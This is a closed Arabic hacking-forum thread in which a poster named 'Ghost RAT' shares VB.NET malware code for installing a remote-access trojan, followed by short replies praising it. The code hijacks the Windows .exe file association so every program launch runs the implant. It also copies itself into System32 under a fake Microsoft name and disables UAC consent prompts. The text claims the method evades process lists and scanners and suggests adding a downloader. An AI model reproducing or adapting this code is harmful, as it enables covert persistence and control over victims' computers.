حالة الموضوع:
مغلق
  1. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    476
    الإعجابات المتلقاة:
    163
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    [​IMG]
    الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...
    ... و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين ...
    ...فإن أصدق الحديث كتاب الله تعالى و خير الهدي هديُ سيدنا محمد صلى الله عليه و سلم ... آمآ بعد...
    [​IMG]
    الطريقة أيضاء تفيــد في تخطي البروسيس وبرامج الفحص لكن أذا وضعت شرط فقط سوف تتخطى العملية البروسيس على النواتين لأنه الكود لايعتمد على الحقن
    وسوف تظهر العملية في البروسيس اذا تحقق الشرط . طبعاء الطريقة الي راح اضعها لها أكثر من طريقة استغلال ليس لأتثبيت فقط بأمكانك الاستفادة منها في مراقبة المسارات وفي برأمج الفحص ايضاء او الحقن في البرامج التنفيذية
    الطريقة بأمكانك استخدامها ايضاء مع الملفات txt و rtf و png و wav وكثير من الصيغ الكود هاذا فقط لـ exe

    * من عيوب هاذي الطريقة
    انهاء تحتاج الى صلاحيات المسؤؤل لتعمل بشكل صحيح ( لكن ليس هاذا صعب توجد طرق لتخطي هاذي العقبة )


    الكود اللذي راح ارفقو بلغة vbnet

    الطريقة اضافة
    ConsoleApplication
    ثم
    Module1

    اضافة الكود
    كود:
    Module Module1
        Sub Main()
            Dim GetCommand$ = Command() 'استقبال   
            If Not GetCommand = Nothing Then : GetCommand = GetCommand.Replace("""", "")
                Shell(GetCommand, AppWinStyle.NormalFocus) 'شل
    
                '''''''''
                MsgBox("Server Run <1> = " + GetCommand)  '  ضع شرط بسيط اذا تؤفر ينسخ السيرفر نفسه في مسار ويشتغل او استخدم داونلودر
                '''''''''
                End : Else
                If Not SetRgt("C:\Windows\System32\", "MicrosoftAIO.EXe") = "bad" Then
                    MsgBox("ON")
                    End : End If
            End If
        End Sub
        Sub relax()
            On Error Resume Next
            ' اخفاء نافذة التشغيل كمسؤؤل
            ' في حالة تشغيل اي برنامج كمسؤؤل بعد الان لن تظهر النافذة
            Dim S$ = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
            Microsoft.Win32.Registry.SetValue(S, "ConsentPromptBehaviorAdmin", "0", Microsoft.Win32.RegistryValueKind.DWord)
        End Sub
        Function SetRgt(Str1$, Str2$)
            Try
                'EXE
                Dim s$ = Str1 + Str2 : relax()
                Microsoft.Win32.Registry.SetValue("HKEY_CLASSES_ROOT\exefile\shell\open\command", Nothing _
                    , s + " " + """%1"" %*")
                If System.IO.File.Exists(s) Then System.IO.File.Delete(s)
                System.IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, s)
                ';
                Return "nice"
            Catch ex As Exception
                Return "bad"
            End Try
    
        End Function
    End Module
    My Project
    Startup = sub main
    Application type = windowa forms application


    استبدل المسج
    MsgBox("Server Run <1> = " + GetCommand)

    بشرط + تشغيل السيرفر من مسار أخر غير السستم
    واذا ماتؤفر الشرط لن تظهر العملية في البروسيس My Project
    Startup = sub main
    Application type = windowa forms application


    استبدل المسج
    MsgBox("Server Run <1> = " + GetCommand)

    بشرط + تشغيل السيرفر من مسار أخر غير السستم

    ماتؤفر الشرط لن تظهر العملية في البروسيس
    [​IMG]
    <<<<<<<<<<<

    [ منكم الدعم ومنآ الجديد ]
    [​IMG]
     
    X-vipe ،بــرهــومــي ،MaX ~ و 2آخرون معجبون بهذا.
  2. عـقرب الـنجف

    عـقرب الـنجف DeveloPer Plus

    الأنتساب:
    ‏5 يونيو 2015
    المشاركات:
    299
    الإعجابات المتلقاة:
    168
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الوظيفة:
    programmer
    الإقامة:
    العراق
    ما شاء الله عاشت ايدك حبيبي ابو جاسم
    مبدع دائماً
     
    أعجب بهذه المشاركة Ghost RAT
  3. ♕| s c я є α м |♕

    ♕| s c я є α м |♕ مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    630
    الإعجابات المتلقاة:
    668
    نقاط الجائزة:
    93
    الإقامة:
    7
    رائع حبيبي طريقة جميــله وقويه
    شكر لك
     
    أعجب بهذه المشاركة Ghost RAT
  4. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    طريقة فعالة بارك الله بيك
     
    أعجب بهذه المشاركة Ghost RAT
  5. X-vipe

    X-vipe Developer

    الأنتساب:
    ‏6 نوفمبر 2012
    المشاركات:
    72
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    Spam
    الإقامة:
    Jordan
    يعطيك العآفية ~
     
    أعجب بهذه المشاركة Ghost RAT
  6. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    476
    الإعجابات المتلقاة:
    163
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    وانت العايش حبيبي
    شكرا لك على مرورك
     
  7. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    476
    الإعجابات المتلقاة:
    163
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    اسعدني مرورك يغالي
     
  8. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    476
    الإعجابات المتلقاة:
    163
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    زادني شرف مرورك على موضوع
     
  9. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    476
    الإعجابات المتلقاة:
    163
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    يسلمو على مرورك يغالي
     
  10. αℓɪ αℓɪяαqɪ

    αℓɪ αℓɪяαqɪ Active DeveloPer

    الأنتساب:
    ‏30 يونيو 2015
    المشاركات:
    164
    الإعجابات المتلقاة:
    38
    نقاط الجائزة:
    28
    عاشت ايدك حبيبي حمودي
     
    أعجب بهذه المشاركة Ghost RAT
حالة الموضوع:
مغلق

مشاركة هذه الصفحة